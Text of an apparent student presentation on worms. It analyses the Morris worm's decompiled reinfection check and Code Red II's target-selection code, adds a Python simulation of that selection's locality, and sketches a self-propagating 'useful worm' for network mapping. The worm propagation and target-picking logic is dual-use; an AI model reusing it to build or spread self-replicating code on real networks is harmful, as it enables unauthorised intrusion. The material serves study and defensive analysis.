The Worm Works For You
Matt Weaver
CS591
Introduction
The Shockwave Rider
PARC
Town Crier
Vampire
Goal
Use a worm to measure bandwidth and map a network.
Analyze classic worms.
Morris
Code Red
Determine the algorithm and architecture of a “useful worm”
Morris Mistake
Listen on a port: failure leads to infection.
Machines were reinfected.
Morris
checkother()                                          /* 0x57d0 */
{
    int s, l8, l12, l16, optval;
    struct sockaddr_in sin;                           /* 16 bytes */

    optval = 1;
    /* One time in seven the check is skipped outright and the worm
       proceeds as if no other copy were running. */
    if ((random() % 7) == 3)
        return;
    s = socket(AF_INET, SOCK_STREAM, 0);              /* 612 */
    if (s < 0)
        return;
    /* Make a socket to the localhost, using a link-time specific port */
    bzero(&sin, sizeof(sin));                         /* 16 */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */
    sin.sin_port = 0x00005b3d;
    /* Nobody listening on the port is treated as "no other copy here":
       the socket is closed and the worm carries on, so the check only
       ever stops a copy when an earlier one answers. */
    if (connect(s, &sin, sizeof(sin)) < 0) {
        close(s);
    } else {
        /* An earlier copy answered: exchange magic numbers with it */
        l8 = MAGIC_2;
        if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
            close(s);
            return;
        }
        l8 = 0;
        if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
            close(s);
            return;
        }
        if (l8 != MAGIC_1) {
            close(s);
            return;
        }
        l12 = random()/8;
        if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
            close(s);
            return;
        }
        /* ??? */
        /* Magic number??? */
        /* the slide's excerpt of the decompiled function ends here */
    }
}
Code Red II
Mountain Dew
Code Red utilized a clever distribution scheme: not just the random IP trick.
Code Red II (Continued)
mtable[] = { 0xFFFFFFFF,    // go anywhere
             0xFFFFFF00,    // stay in class A
             0xFFFFFF00,    // stay in class A
             0xFFFFFF00,    // stay in class A
             0xFFFFFF00,    // stay in class A
             0xFFFF0000,    // stay in class B
             0xFFFF0000,    // stay in class B
             0xFFFF0000 };  // stay in class B

# start with a random number that will be our new IP address.
# I presume the random number generator is "random enough".
newip = random();

# zero the UPPER octets of the random IP, which means that the
# random number won't participate in the class A or class B
# address
mask = mtable[ random() & 0x7 ];   // locate a mask
newip &= mask;                     // throw away rightmost bits

# flip the mask around to operate on LOWER octets
mask = ~mask;                      // flip the mask around
myip = LOCAL_IP & mask;            // throw away leftmost bits

# newip contains the upper bits
# myip contains the lower bits
# join them:
newip |= myip;

if (newip starts with 127) try again   // localhost
if (newip starts with 224) try again   // multicast
if (newip matches LOCAL_IP) try again

Connect to "newip" and try to infect
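Added example, not part of the presentation and not Code Red II's own code: it models the mask table above in Python to quantify how much of the worm's probing stays inside the infected host's own /8 and /16, which is why one infected machine stands out so strongly in internal flow logs. It assumes a little-endian x86 host, so the mask is applied to the address as stored in network byte order (the low byte of the integer is the first dotted octet); the local address 10.1.2.3 is a constructed sample.

```python
import random
import ipaddress

# Mask table from the slide. On little-endian x86 the address is masked as it
# sits in memory (network byte order), so the LOW byte of the integer is the
# FIRST dotted octet: 0xFFFFFF00 takes only the class A octet from LOCAL_IP.
MTABLE = [0xFFFFFFFF,                                      # go anywhere
          0xFFFFFF00, 0xFFFFFF00, 0xFFFFFF00, 0xFFFFFF00,  # stay in class A
          0xFFFF0000, 0xFFFF0000, 0xFFFF0000]              # stay in class B

def ip_to_mem(ip):
    """Dotted quad -> the 32-bit value an x86 host holds in its in_addr."""
    return int.from_bytes(ipaddress.IPv4Address(ip).packed, "little")

def mem_to_ip(value):
    return str(ipaddress.IPv4Address(value.to_bytes(4, "little")))

def combine(local_ip, rand32, mask):
    """One application of the mask: random part ORed with the local part."""
    local = ip_to_mem(local_ip)
    return mem_to_ip((rand32 & mask) | (local & ~mask & 0xFFFFFFFF))

def pick_target(local_ip, rng):
    """The selection loop from the slide, including its three retry rules."""
    local = ip_to_mem(local_ip)
    while True:
        rand32 = rng.getrandbits(32)
        mask = MTABLE[rng.getrandbits(3)]
        newip = ip_to_mem(combine(local_ip, rand32, mask))
        first = newip & 0xFF                     # first dotted octet
        if first in (127, 224) or newip == local:
            continue                             # localhost, multicast, self
        return mem_to_ip(newip)

def locality_split(local_ip, n, seed=1):
    """Share of n picks landing in the local /8 and in the local /16."""
    rng = random.Random(seed)
    local = ipaddress.IPv4Address(local_ip).packed
    same8 = same16 = 0
    for _ in range(n):
        t = ipaddress.IPv4Address(pick_target(local_ip, rng)).packed
        if t[0] == local[0]:
            same8 += 1
            if t[1] == local[1]:
                same16 += 1
    return same8 / n, same16 / n
```

With the mask table weighted 1:4:3, `locality_split("10.1.2.3", 20000)` comes out near (0.875, 0.377): about seven of every eight probes stay in the host's own /8 and three of every eight in its own /16.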
A New Worm
[Diagram: a Root machine and several Target machines on the Network]
Logic
- Write a text file (C on Win, ~ on Unix)
- Talk to parent.
- Find next machine.
- Infect next.
- Talk to parent.
- Timed death.
- Forced death (success).
[Diagram: Parent, Child, Next Target]
Concerns
Running amok/re-infection.
Termination
The Root Machine
Compiles UDP payload information from child instances.
Maps network.
Dynamically generate viral payload (binary).
Provide control values.
Conclusion
Master’s Project: get it working safely.
Sources
- Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.
- CERT. http://www.cert.org/
- Eren, Sinan. “Smashing the Kernel Stack for Fun and Profit.” Phrack 60.
- Erickson, Jon. Hacking: The Art of Exploitation. No Starch Press, 2003.
- Morris, Robert. Morris Worm Source Code. http://www.foo.be/docs-free/morris-worm/worm/
- Wikipedia, “Computer Worm”. http://en.wikipedia.org/wiki/Computer_worm
- Friedl, Steve. Unix Wiz. http://www.unixwiz.net/